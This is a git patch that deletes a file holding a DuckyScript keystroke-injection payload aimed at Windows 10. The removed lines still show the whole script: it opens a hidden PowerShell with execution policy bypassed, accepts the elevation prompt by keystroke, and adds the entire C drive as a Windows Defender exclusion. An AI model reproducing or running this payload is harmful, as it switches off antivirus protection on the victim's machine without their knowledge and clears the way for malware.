From fa8d8ba04583126a0fe099efa3c0e2ee7ac926d7 Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Mon, 8 May 2023 23:15:42 +0000 Subject: [PATCH] Delete Add Exclusion C-drive.txt --- Add Exclusion C-drive.txt | 23 ----------------------- 1 file changed, 23 deletions(-) delete mode 100644 Add Exclusion C-drive.txt diff --git a/Add Exclusion C-drive.txt b/Add Exclusion C-drive.txt deleted file mode 100644 index 32774f3..0000000 --- a/Add Exclusion C-drive.txt +++ /dev/null @@ -1,23 +0,0 @@ -REM Title: Add Exclusion C-drive -REM Author: @beigeworm -REM Description: Uses Powershell to add an exclusion to Windows Defender to ingore any files within C:/ -REM Target: Windows 10 - -REM some setup for dukie script. -DEFAULT_DELAY 100 - -REM open powershell (remove -W Hidden to show the window). -GUI r -DELAY 750 -STRING powershell -NoP -NonI -W Hidden -Exec Bypass -CTRL-SHIFT ENTER -DELAY 1500 -ALT y -DELAY 5000 - -REM add the exclusion path. -STRING Add-MpPreference -ExclusionPath C:/ -ENTER -DELAY 250 -STRING exit -ENTER